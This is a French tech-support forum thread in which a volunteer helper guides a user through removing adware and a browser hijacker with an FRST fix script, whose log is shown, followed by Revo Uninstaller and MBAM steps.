2017-05-02 11:40 - 2017-05-05 11:44 - 00000000 ____D C:\Users\Fabien\AppData\Roaming\WinSAPSvc
2017-05-02 11:40 - 2017-05-02 11:40 - 00000000 ____D C:\Users\Fabien\AppData\Local\SNARE
C:\Users\Fabien\AppData\Local\background_fault\aswRD.exe
Shared C Run-time for x64 (HKLM\...\{EF79C448-6946-4D71-8134-03407888C054}) (Version: 10.0.0 - McAfee)
HKU\S-1-5-21-2178201453-3891589226-2901520741-1001\...\ChromeHTML: -> "C:\Program Files (x86)\Zoohair\Application\chrome.exe" -- "%1" <==== ATTENTION
Task: {123BC702-66F4-4592-AF8A-D1F9FE46B0CD} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-02-06] () <==== ATTENTION
ShortcutWithArgument: C:\Users\Fabien\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493718003&z=d316a489ef35d6b2e9ef1bag0zbt2cbm9g7bfebe6g&from=ypid&uid=WDCXWD10JPVX-22JC3T0_WD-WXA1E63ZHP67ZHP67
ShortcutWithArgument: C:\Users\Fabien\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493718003&z=d316a489ef35d6b2e9ef1bag0zbt2cbm9g7bfebe6g&from=ypid&uid=WDCXWD10JPVX-22JC3T0_WD-WXA1E63ZHP67ZHP67
2017-05-04 21:33 - 2017-05-03 15:34 - 00323584 _____ () C:\Users\Fabien\AppData\Local\background_fault\bf.dll
FirewallRules: [{64E54A62-E65E-4D63-B5E5-22F3729015F5}] => (Allow) C:\Program Files\Common Files\mcafee\mcsvchost\McSvHost.exe
FirewallRules: [{90BF17C4-2820-4010-9947-FA3B430B7248}] => (Allow) C:\Program Files\Common Files\mcafee\mcsvchost\McSvHost.exe
ShortcutWithArgument: C:\Users\Fabien\Desktop\BigFarm.lnk -> C:\Program Files (x86)\Firefox\Firefox.exe (Mozilla Corporation) -> hxxp://bigfarm.goodgamestudios.com/?w=239064
ShortcutWithArgument: C:\Users\Fabien\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493718003&z=d316a489ef35d6b2e9ef1bag0zbt2cbm9g7bfebe6g&from=ypid&uid=WDCXWD10JPVX-22JC3T0_WD-WXA1E63ZHP67ZHP67
ShortcutWithArgument: C:\Users\Fabien\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493718003&z=d316a489ef35d6b2e9ef1bag0zbt2cbm9g7bfebe6g&from=ypid&uid=WDCXWD10JPVX-22JC3T0_WD-WXA1E63ZHP67ZHP67
R2 BIT; C:\ProgramData\BIT\BIT.dll [1857536 2017-05-04] (windows) [Fichier non sign�]
R2 IISvr; C:\ProgramData\Package Cache\{59399776-575D-9C54-E861-0D5EAB7E707D}v10.1.14393.795\Installers\IIS\iisexp.dll [105472 2017-05-04] () [Fichier non sign�]
2017-05-04 21:34 - 2017-05-04 05:41 - 00105472 _____ () c:\programdata\package cache\{59399776-575d-9c54-e861-0d5eab7e707d}v10.1.14393.795\installers\iis\iisexp.dll
Hosts:
EmptyTemp:
Reboot:
Read more at https://www.cjoint.com/c/GEhuwq16xcl#rsIGgyVTGeEr5q91.99
Le Point de restauration a été créé avec succès.
Processus fermé avec succès.
C:\Users\Fabien\AppData\Local\background_fault\aswRD.exe => Aucun processus actif trouvé
HKU\S-1-5-21-2178201453-3891589226-2901520741-1001\Software\Microsoft\Windows\CurrentVersion\Run\\background_fault => valeur supprimé(es) avec succès
HKLM\Software\\Microsoft\Internet Explorer\Main\\Start Page => valeur restauré(es) avec succès
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Start Page => valeur restauré(es) avec succès
HKLM\Software\\Microsoft\Internet Explorer\Main\\Search Page => valeur restauré(es) avec succès
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Search Page => valeur restauré(es) avec succès
HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Page_URL => valeur restauré(es) avec succès
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Page_URL => valeur restauré(es) avec succès
HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Search_URL => valeur restauré(es) avec succès
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Search_URL => valeur restauré(es) avec succès
HKU\S-1-5-21-2178201453-3891589226-2901520741-1001\Software\Microsoft\Internet Explorer\Main\\Start Page => valeur restauré(es) avec succès
HKU\S-1-5-21-2178201453-3891589226-2901520741-1001\Software\Microsoft\Internet Explorer\Main\\Default_Page_URL => valeur restauré(es) avec succès
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => valeur restauré(es) avec succès
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => clé supprimé(es) avec succès
HKCR\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => clé non trouvé(e).
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => valeur restauré(es) avec succès
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => clé supprimé(es) avec succès
HKCR\Wow6432Node\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => clé non trouvé(e).
HKU\S-1-5-21-2178201453-3891589226-2901520741-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => clé supprimé(es) avec succès
HKCR\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => clé non trouvé(e).
HKLM\SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE\shell\open\command\\Default => valeur restauré(es) avec succès
HKU\S-1-5-21-2178201453-3891589226-2901520741-1001\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\\HomeButtonPage => valeur supprimé(es) avec succès
C:\Users\Fabien\AppData\Roaming\Firefox\Firefox\Profiles\2mkgwlxs.default-1492445865743\Extensions\@DA3566E2-F709-11E5-8E87-A604BC8E7F8B.xpi => déplacé(es) avec succès
C:\Users\Fabien\AppData\Roaming\Firefox\Firefox\Profiles\2mkgwlxs.default-1492445865743\Extensions\@H99KV4DO-UCCF-9PFO-9ZLK-8RRP4FVOKD9O.xpi => déplacé(es) avec succès
HKLM\System\CurrentControlSet\Services\FirefoxU => clé supprimé(es) avec succès
FirefoxU => service supprimé(es) avec succès
HKLM\System\CurrentControlSet\Services\Kitty => clé supprimé(es) avec succès
Kitty => service supprimé(es) avec succès
SNARE => Impossible d'arrêter le service.
HKLM\System\CurrentControlSet\Services\SNARE => clé supprimé(es) avec succès
SNARE => service supprimé(es) avec succès
WANARE => Impossible d'arrêter le service.
HKLM\System\CurrentControlSet\Services\WANARE => clé supprimé(es) avec succès
WANARE => service supprimé(es) avec succès
WinSAPSvc => Impossible d'arrêter le service.
HKLM\System\CurrentControlSet\Services\WinSAPSvc => clé supprimé(es) avec succès
WinSAPSvc => service supprimé(es) avec succès
C:\Users\Fabien\AppData\Local\WANARE => déplacé(es) avec succès
C:\Users\Fabien\AppData\Local\Zoohair => déplacé(es) avec succès
C:\Users\Fabien\AppData\Local\Kitty => déplacé(es) avec succès
C:\Users\Fabien\Downloads\avastclear.exe => déplacé(es) avec succès
C:\WINDOWS\System32\Tasks\Milimili => déplacé(es) avec succès
"C:\Users\Fabien\AppData\Roaming\WinSAPSvc" dossier déplacer:
Impossible de déplacer "C:\Users\Fabien\AppData\Roaming\WinSAPSvc" => Planifié pour déplacement au redémarrage.
C:\Users\Fabien\AppData\Local\SNARE => déplacé(es) avec succès
C:\Users\Fabien\AppData\Local\background_fault\aswRD.exe => déplacé(es) avec succès
Shared C Run-time for x64 (HKLM\...\{EF79C448-6946-4D71-8134-03407888C054}) (Version: 10.0.0 - McAfee) => Erreur: Pas de correction automatique trouvée pour cet élément.
HKU\S-1-5-21-2178201453-3891589226-2901520741-1001_Classes\ChromeHTML => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{123BC702-66F4-4592-AF8A-D1F9FE46B0CD} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{123BC702-66F4-4592-AF8A-D1F9FE46B0CD} => clé supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\Milimili => non trouvé(e).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Milimili => clé supprimé(es) avec succès
C:\Users\Fabien\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk => Raccourci argument supprimé(es) avec succès.
C:\Users\Fabien\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk => Raccourci argument supprimé(es) avec succès.
C:\Users\Fabien\AppData\Local\background_fault\bf.dll => déplacé(es) avec succès
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{64E54A62-E65E-4D63-B5E5-22F3729015F5} => valeur supprimé(es) avec succès
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{90BF17C4-2820-4010-9947-FA3B430B7248} => valeur supprimé(es) avec succès
C:\Users\Fabien\Desktop\BigFarm.lnk => Raccourci argument supprimé(es) avec succès.
C:\Users\Fabien\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk => Raccourci argument supprimé(es) avec succès.
C:\Users\Fabien\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk => Raccourci argument supprimé(es) avec succès.
BIT => Impossible d'arrêter le service.
HKLM\System\CurrentControlSet\Services\BIT => clé supprimé(es) avec succès
BIT => service supprimé(es) avec succès
HKLM\System\CurrentControlSet\Services\IISvr => clé supprimé(es) avec succès
IISvr => service supprimé(es) avec succès
c:\programdata\package cache\{59399776-575d-9c54-e861-0d5eab7e707d}v10.1.14393.795\installers\iis\iisexp.dll => déplacé(es) avec succès
C:\Windows\System32\Drivers\etc\hosts => déplacé(es) avec succès
Hosts restauré(es) avec succès.
Read more at https://www.cjoint.com/c/GEhuwq16xcl#rsIGgyVTGeEr5q91.99 => Erreur: Pas de correction automatique trouvée pour cet élément.
=========== EmptyTemp: ==========
BITS transfer queue => 6078385 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 11821490 B
Java, Flash, Steam htmlcache => 3140 B
Windows/system/drivers => 13502856 B
Edge => 0 B
Chrome => 0 B
Firefox => 0 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 10812544 B
LocalService => 0 B
NetworkService => 7124 B
Fabien => 2650510 B
RecycleBin => 165844311 B
EmptyTemp: => 201 MB données temporaires supprimées.
================================
Résultats du déplacement planifié des fichiers (Mode d'amorçage: Normal) (Date&Heure: 07-05-2017 22:48:49)
C:\Users\Fabien\AppData\Roaming\WinSAPSvc => a été déplacé(e) avec succès
Fin de Fixlog 22:48:49
L'icone du jeu n'affiche plus le logo du jeu mais un dossier blanc.Firefox est toujours en anglais avec la page de recherche Inme. JE peut plus supprimer Firefox car il n'apparait plus dans les programmes a désinstaller dans "programme et fonctionalité"
billmaxime
Messages postés
50403
Date d'inscription
dimanche 20 novembre 2011
Statut
Contributeur
Dernière intervention
22 novembre 2024
6 005
Modifié le 7 mai 2017 à 23:38
Modifié le 7 mai 2017 à 23:38
re
L'icone du jeu n'affiche plus le logo du jeu mais un dossier blanc
je l'ai supprimée avec le script, le jeu se trouve dans C:\programmes files x86
tu peux le désinstaller via programmes et fonctionnalités
Firefox est toujours en anglais avec la page de recherche Inme. JE peut plus supprimer Firefox car il n'apparait plus dans les programmes a désinstaller dans "programme et fonctionalité"</ital>
essaie de le désinstaller avec Revo Uninstaller
le lien >> https://www.commentcamarche.net/telecharger/utilitaires/19405-revo-uninstaller/
le tutoriel >> https://www.commentcamarche.net/telecharger/utilitaires/19405-revo-uninstaller/
désinstalle aussi ceci avec Revo:
C:\Program Files (x86)\Zoohair\Application\chrome.exe
quand c'est fait, fait 1 scan avec MBAM et poste le rapport
PS:regarde cette page pour supprimer Inme dans Firefox, clique sur "supprimer des moteurs de recherche"
https://support.mozilla.org/fr/kb/ajouter-ou-supprimer-un-moteur-de-recherche-dans-firefox
@ demain, je vais dormir
le taux de radiation est plus élevé au pôle emploi qu'à Tchernobyl
L'icone du jeu n'affiche plus le logo du jeu mais un dossier blanc
je l'ai supprimée avec le script, le jeu se trouve dans C:\programmes files x86
tu peux le désinstaller via programmes et fonctionnalités
Firefox est toujours en anglais avec la page de recherche Inme. JE peut plus supprimer Firefox car il n'apparait plus dans les programmes a désinstaller dans "programme et fonctionalité"</ital>
essaie de le désinstaller avec Revo Uninstaller
le lien >> https://www.commentcamarche.net/telecharger/utilitaires/19405-revo-uninstaller/
le tutoriel >> https://www.commentcamarche.net/telecharger/utilitaires/19405-revo-uninstaller/
désinstalle aussi ceci avec Revo:
C:\Program Files (x86)\Zoohair\Application\chrome.exe
quand c'est fait, fait 1 scan avec MBAM et poste le rapport
PS:regarde cette page pour supprimer Inme dans Firefox, clique sur "supprimer des moteurs de recherche"
https://support.mozilla.org/fr/kb/ajouter-ou-supprimer-un-moteur-de-recherche-dans-firefox
@ demain, je vais dormir
le taux de radiation est plus élevé au pôle emploi qu'à Tchernobyl
BardeZoulou
Messages postés
102
Date d'inscription
dimanche 7 juin 2015
Statut
Membre
Dernière intervention
21 février 2018
8 mai 2017 à 00:06
8 mai 2017 à 00:06
j'ai réussit a désinstaller firefox avec le mode chasseur de Revo Uninstaller et pour Chrome, j'ai pas eu besoin de de désinstaller car il était déjà enlever . J'ai réinstaller Firefox, maintenant il est en français, cool
A chaque fois que je redémarre Firefox, il me demande a chaque fois si je veut en faire comme navigateur principal, je le fait a chaque fois et il me me le redemande quand je lance le logiciel.
Le scan de MBAM, le voici: https://www.cjoint.com/c/GEhweZMiBoX
A chaque fois que je redémarre Firefox, il me demande a chaque fois si je veut en faire comme navigateur principal, je le fait a chaque fois et il me me le redemande quand je lance le logiciel.
Le scan de MBAM, le voici: https://www.cjoint.com/c/GEhweZMiBoX
billmaxime
Messages postés
50403
Date d'inscription
dimanche 20 novembre 2011
Statut
Contributeur
Dernière intervention
22 novembre 2024
6 005
8 mai 2017 à 06:34
8 mai 2017 à 06:34
salut
maintenant que tu as désinstallé et réinstallé Firefox, tu n'as plus la page de recherche Inme ?
tu peux me refaire 1 scan avec FRST et poster les 3 rapports (je regarderai les rapports vers 17H en rentrant du boulot)
FRST
ADDITION
SHORCUT
PS: regarde les éventuels problèmes qui persistent quand tu utilises ton pc, et signale les moi
merci
@+
maintenant que tu as désinstallé et réinstallé Firefox, tu n'as plus la page de recherche Inme ?
tu peux me refaire 1 scan avec FRST et poster les 3 rapports (je regarderai les rapports vers 17H en rentrant du boulot)
FRST
ADDITION
SHORCUT
PS: regarde les éventuels problèmes qui persistent quand tu utilises ton pc, et signale les moi
merci
@+
BardeZoulou
Messages postés
102
Date d'inscription
dimanche 7 juin 2015
Statut
Membre
Dernière intervention
21 février 2018
8 mai 2017 à 10:45
8 mai 2017 à 10:45
Bonjour,
en réinstallant Firefox, j'ai plus la page Inme, j'ai la page d’accueil Firefox, comme j'avais avant mon soucis, celle que je me sert d'habitude.
A part le problème quand je lance Firefox qui me demande a chaque fois si je veut qu'il soit mon navigateur par défaut, je voit pas d'autre soucis pour l'instant sur mon ordi.
Voila les rapport de FRST
FRST: https://www.cjoint.com/c/GEiiS1TQz7X
ADDITION: https://www.cjoint.com/c/GEiiTrVdFoX
SHORTCUT: https://www.cjoint.com/c/GEiiTSHiK4X
Merci
en réinstallant Firefox, j'ai plus la page Inme, j'ai la page d’accueil Firefox, comme j'avais avant mon soucis, celle que je me sert d'habitude.
A part le problème quand je lance Firefox qui me demande a chaque fois si je veut qu'il soit mon navigateur par défaut, je voit pas d'autre soucis pour l'instant sur mon ordi.
Voila les rapport de FRST
FRST: https://www.cjoint.com/c/GEiiS1TQz7X
ADDITION: https://www.cjoint.com/c/GEiiTrVdFoX
SHORTCUT: https://www.cjoint.com/c/GEiiTSHiK4X
Merci